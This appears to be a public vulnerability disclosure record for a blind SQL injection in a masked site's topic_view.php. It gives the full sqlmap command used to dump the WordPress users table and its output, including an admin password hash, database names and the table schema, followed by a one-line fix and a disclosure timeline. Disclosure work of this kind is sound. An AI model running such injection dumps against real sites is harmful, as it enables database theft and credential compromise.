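2015-12-03: Details reported to the vendor; awaiting vendor response
2015-12-07: Vendor confirmed; details disclosed to the vendor only
2015-12-17: Details disclosed to core white hats and experts in related fields
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public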
When will I be able to buy a home?
URL: http://**.**.**.**/topic_view.php?topicid=246
$ python sqlmap.py -u "http://**.**.**.**/topic_view.php?topicid=246" -p topicid --technique=B --random-agent --batch --no-cast -D princetw_blog -T wp_users -C user_login,user_pass,user_email --dump
Database: princetw_blog
Table: wp_users
[1 entry]
+------------+------------------------------------+----------------------+
| user_login | user_pass                          | user_email           |
+------------+------------------------------------+----------------------+
| admin      | $P$9FplHSzboldLGi93hTXuuOdQ9WTE4v. | newhouse@**.**.**.** |
+------------+------------------------------------+----------------------+
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5
available databases [4]:
[*] information_schema
[*] princetw_blog
[*] princetw_test
[*] princetw_utf

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: topicid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: topicid=246 AND 7614=7614
---
web application technology: PHP 5.4.22, Apache 2.0.64
back-end DBMS: MySQL 5

Database: princetw_blog
[10 tables]
+-----------------------+
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

Database: princetw_blog
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+

Database: princetw_blog
+----------+---------+
| Table    | Entries |
+----------+---------+
| wp_users | 1       |
+----------+---------+
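Deploy a WAF.
Severity: High
Vulnerability Rank: 16
Confirmed: 2015-12-07 01:40
Thank you for the report.
2016-02-20: After receiving the report, HITCON emailed the service mailbox listed on the website several times; there had still been no response by the time the vulnerability was made public.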